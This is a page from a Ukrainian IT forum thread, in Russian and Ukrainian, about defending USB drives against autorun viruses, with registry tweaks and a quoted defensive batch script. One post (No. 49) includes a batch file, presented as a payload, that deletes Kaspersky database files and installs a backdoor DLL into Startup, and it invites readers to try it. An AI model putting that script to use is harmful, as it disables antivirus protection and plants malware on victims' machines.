Сб, 19.05.2012, 08:12
Форум інформатиків України
Головна Реєстрація Вхід
Вітаю Вас, Гість · RSS
Вітання на форумі
Незнайомець
Вітаємо на форумі,
Незнайомцю!

   
зареєструйтесь
Перед реєстрацією обов’язково прочитайте:
Оновлення Учасники Пошук
Видавництво ’’Аспект’’ Видавництво
Сторінка 4 з 4«1234
Модератор форуму: НІКОЛЯ, Ktara, Bandalak, volevikt 
Форум інформатиків » РОЗДІЛ V: ПРОГРАМНЕ ЗАБЕЗПЕЧЕННЯ » 5.8 Антивірусні програми » Комп’ютерні віруси (Новини про комп’ютерні віруси, поділ знаннями про віруси.)
Комп’ютерні віруси
Ковальчук_Олександр Дата: Вт, 16.10.2007, 18:20 | Повідомлення № 1
Адмін
Група: Адміністратори
Повідомлень: 3052
Нагороди: 10
Все, що знаєте про комп’ютерні віруси, залишайте в повідомленнях даної теми.

Шановні форумчани!!!!!
Повідомлення, які не відповідають темі або несуть некорисний зміст будуть видалятись без попередження!!!


Відредаговано: WWW - Пт, 06.06.2008, 01:24
Andrey123q Дата: Сб, 07.11.2009, 03:24 | Повідомлення № 46
Досвідчений учасник
Група: Друзі форуму
Повідомлень: 1228
Нагороди: 3
Согласен, для рядового пользователя это слишком и в комп классе может легче мини программки. Но лично для меня этот способ с политиками и реестром есть оптимальным. Таких папок и файлов как правило немного, антивирус их не всегда все увидит, - мне не сложно открыть флешку и вручную несколькими нажатиями мышки это сделать. Предпочитаю доверять своим рукам, чем мини программкам, которые делают то же самое, и не всегда известно как и к каким последствиям может привести.
Quote (Махновець_Ігор)
у вас віруси не активуються, але на флешці вони будуть

их должен удалить антивирус. если не удалит антивирус, сомневаюсь что все удалит какая-либо программка

Quote (Махновець_Ігор)
це треба робити на кожному пк де ви використовуєте флешку то так можна й захекаться від прописування реєстрів!

не обязательно. даже если заразится, на мой ПК все-равно не проникнут.
а reg-файл? - запуск-настройка программки на каждом ПК быстрее?
Еще раз говорю: мне так удобно со своим ПК дома, никому ничего не навязываю. На работе флешки мы запретили.

Знаете, у меня просто некоторая такая аллергия выработалась к подобным программкам, которые пытаются что-то оптимизировать за меня, в то время как то же могу сделать я сам. Действие программок - от краха системы до повреждения Partition Table. Берусь за программки, только тогда когда не могу сделать что-то сам. Мне так удобно, пусть для вас это и глупо.
Ладно, щас какую-то программку посмотрю попробую ;)

Ковальчук_Олександр Дата: Сб, 07.11.2009, 03:37 | Повідомлення № 47
Адмін
Група: Адміністратори
Повідомлень: 3052
Нагороди: 10
Як на мене, то і спосіб Andrey123q і спосіб використовувати програми додактові варті уваги.
Раніше, коли не знав про USB Disk Security і Зорький Глаз, забороняв автозапуск, а далі флешку відкривав тільки Total Commander, який завжди показує приховані файли і видаляв вручну авторановський файл і вірус(и). Як правило, після намагання видалити файл починав кричати Доктор Веб і допомагав мені це зробити. Тепер використовую обидві ці програми і дуже задоволений, оскільки це додатковий захист, який ні в якому разі лишнім не буває. Але як правило, сигналізують небезпеку і USB Disk Security Доктор Веб майже одночасно, тому інколи не знаю, на яку кнопку тиснути для видалення зарази. :)
P.S. Після видалення вірусів за допомогою цих програм всеодно заходжу в Total Commander і перевіряю візуально, чи точно видалили. Довіряти не можна нікому.
P.P.S. Як USB Disk Security так Зорький Глаз видаляють віруси тільки на поверхні флешки. Якщо є заражені ехе-шники в глибині флешки, то ці програми наврят чи допоможуть.
Andrey123q Дата: Сб, 07.11.2009, 04:34 | Повідомлення № 48
Досвідчений учасник
Група: Друзі форуму
Повідомлень: 1228
Нагороди: 3
Попробовал USB Disk Security. В чем ее плюс? То что она тыкает мне пальцем, что вот мол файл autorun.inf найден или еще что там, что я сам не могу это увидеть?
Очистка реестра и диска - да нет спасибо, как-нибудь сам...
Показывает автозапуск в системе? - для этого пользуюсь элементарной прогой RegCleaner или средствами винды.

Вывод: спасибо не нужно мне таких программок. Раньше я относился к таким вопросам безопасности щепетильно, сейчас уже нет.

Чем плох способ создания reg-файла:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf]
@="@SYS:DoesNotExist"
И никакая нечисть ко мне не проникнит, как бы я флешку не открывал. Зачем мне нужна эта лишняя прога на кампе. Для юзеров конечно самый раз. Буду советовать - спасибо %)

Додано (07.11.2009, 04:22)
---------------------------------------------
Источник: http://www.xakep.ru/magazine/xa/123/030/1.asp
----
Задача опять же та же — запретить вирусу создавать на флешке файл autorun.inf. Когда-то было достаточно просто создать каталог с именем AUTORUN. INF, выставив ему атрибуты «Read only» и «Hidden». Так мы препятствовали созданию файла с тем же именем. Сейчас это, понятно, не вариант. Зато есть чуть модифицированный трик, который большинство малвари обходить пока не научилось. Объясняю идею. Создаем каталог AUTORUN. INF. Если каталог не пустой, удалить его можно, лишь расправившись со всем содержимым. Это очень просто, — но только не в случае, когда в каталоге есть файлы с некоррект ными для FAT32 именами! Именно этот принцип защиты лежит в основе программы USB Disk Security (www.zbshareware.com), которая создает на флешке AUTORUN. INF и в нем файл «zhengbo.» (да-да, с точкой на конце — что, естественно, некорректно). И знаешь: большинство малвари остается не у дел. За свое «ноу-хау» разработчики просят $50, но нам ничего не стоит сделать то же самое вручную. Для этого вспоминаем старый трик из нашей давней статьи «Обход ограничений FAT32/NTFS» (http://www.xakep.ru/magazine/xA/062/080/5.asp), заключающийся в использовании локальных UNC-путей. Напомню, что UNC — это формат для записи пути к файлу, расположенному на удаленном компьютере. Он имеет вид \\server\share\path, где server — это название удаленного хоста. Такой способ доступа к файлам можно использовать и для локальной машины, — только тогда вместо server нужно подставлять «?» или «.», а путь к файлу указывать вместе с буквой диска. Например, так: \\?\C:\ folder\file.txt. Фишка в том, что при использовании UNC-путей и стандартных консольных команд можно создавать файлы даже с запрещенными файловой системой именами. Создадим несложный BAT-файл со следующим содержанием:

mkdir "\\?\J:\AUTORUN.INF\LPT3"

После запуска получим каталог с некорректным именем LPT3, находящийся в папке AUTORUN.INF — обычным способом ее уже не удалить, а значит, малварь не сможет создать файл autorun.inf, оставшись не у дел! Недостатков хватает и у этого способа. Во-первых, разработчики новой малвари могут использовать хинт от обратного и воспользоваться UNC-путями для удаления файлов/папок с некорректным именем: \\?\J:\AUTORUN.INF\LPT3. Директорию можно вообще не удалять — а беспрепятственно переименовать: к примеру, в AUTORUN.INF1. Другой вопрос, что такой малвари пока, опять же, немного. И раз мы заговорили о создании BAT-файла, то накидаем универсальный скриптик, который, помимо всего прочего, будет:

удалять папку, замаскированную под корзину (на флешке ее быть не должно), где располагают свои тела многие черви (в том числе, Downadup), а также папку с файлами восстановления системы;
создавать системную папку AUTORUN.INF с директорией COM1 ;
с удалением такого файла будут трудности даже под NTFS;
удалять и защищать desktop.ini, который также часто используется малварью.
rd /s /q %~d0\recycled
rd /s /q %~d0\recycler
rd /s /q «%~d0\System Volume Information"
del /f /q %~d0\autorun.*
mkdir "\\?\%~d0\autorun.inf\com1"
attrib +s +h %~d0\autorun.inf
del /f /q %~d0\desktop.ini
mkdir "\\?\%~d0\desktop.ini\com1"
attrib +s +h %~d0\desktop.ini

Достаточно сохранить это на флешке с именем, например, autorun.bat и запустить.
----

От себя. В нете на форумах встречал проблемку: антиавторан программы создают папки AUTORUN.INF в т.ч. на жестких дисках, которые не удаляются.
Вообщем удаляются они так же как и создаются, способом описанным в статье выше, именно для создания: mkdir "\\?\J:\AUTORUN.INF\LPT3" , значит для удаления: rd "\\?\N:\AUTORUN.INF\LPT3"
Логично так пробовать удалять файлы и папки на зараженных флешках, используя батник. Возьму способ на заметку. На флешке уже создал неудаляемый AUTORUN.INF. Нужно будет еще попробовать с правами доступа, но нужна NTFS. Вообщем заморозить флешку, чтоб туда вообще никакая нечисть не проникла. ;)
Мне интересней это делать самому чем программками.

Додано (07.11.2009, 04:34)
---------------------------------------------

Quote (Ковальчук_Олександр)
який завжди показує приховані файли

Хотя из Проводника тоже ведь видно (при выставленной опции показа скрытых файлов). Или Проводник может что-то и пропустить? - просто Тотал коммандером не пользуюсь...

Відредаговано: Andrey123q - Сб, 07.11.2009, 05:01
Ірина Дата: Сб, 07.11.2009, 12:02 | Повідомлення № 49
Профі в програмуванні та безпеці
Група: Друзі форуму
Повідомлень: 140
Нагороди: 0
Quote (Andrey123q)
Логично так пробовать удалять файлы и папки на зараженных флешках, используя батник.

Не забывйте что батники можно использовать не только для защиты но и в обратном направлении что некоторые и делають.
Например коль вы затронули батники посмотрим наглядный пример для обезвреживание Касперского можно написать вот такой батник в виде боевой нагрузки

Код:
@echo off
attrib -R c:progra~1antivi~1 ackdoor.avc >nul
attrib -R c:progra~1antivi~1 rojan.avc >nul
del c:progra~1antivi~1 ackdoor.avc >nul
del c:progra~1antivi~1 rojan.avc >nul
copy c:progra~1antivi~1macro.avc c:progra~1antivi~1 ackdoor.avc >nul
copy c:progra~1antivi~1mail.avc c:progra~1antivi~1 rojan.avc >nul
c:windowspkunzip.exe -e -sBackdooR c:windowsASYSLG.DLL
C:WindowsГЛАВНО~1ПРОГРА~1АВТОЗА~1 >nul
del c:windowspkunzip.exe >nul
del c:windowsasyslg.dll >nul
del c:winstart.bat >nul
echo on
Хотя ДОС сейчас мало хто юзает в таких целях а зря. Но мысль хорошая попробуйте и опишите что получилось.

Махновець_Ігор Дата: Сб, 07.11.2009, 13:33 | Повідомлення № 50
Адмін
Група: Адміністратори
Повідомлень: 2139
Нагороди: 11
Quote (Andrey123q)
Еще раз говорю: мне так удобно со своим ПК дома, никому ничего не навязываю.

та я й нічого до вас не маю, просто кожен розуміє це по своєму!

Quote (Andrey123q)
Мне так удобно, пусть для вас это и глупо.

це добре, що вам зручно, я не казав, що ваше бачення даної проблеми дурниця!
Andrey123q Дата: Сб, 07.11.2009, 14:05 | Повідомлення № 51
Досвідчений учасник
Група: Друзі форуму
Повідомлень: 1228
Нагороди: 3
Quote (Махновець_Ігор)
це добре, що вам зручно, я не казав, що ваше бачення даної проблеми дурниця!

Сорри :)
Форум інформатиків » РОЗДІЛ V: ПРОГРАМНЕ ЗАБЕЗПЕЧЕННЯ » 5.8 Антивірусні програми » Комп’ютерні віруси (Новини про комп’ютерні віруси, поділ знаннями про віруси.)
Сторінка 4 з 4«1234
Пошук:


© Форум інформатиків України, 2007-2012. Хостинг від uCoz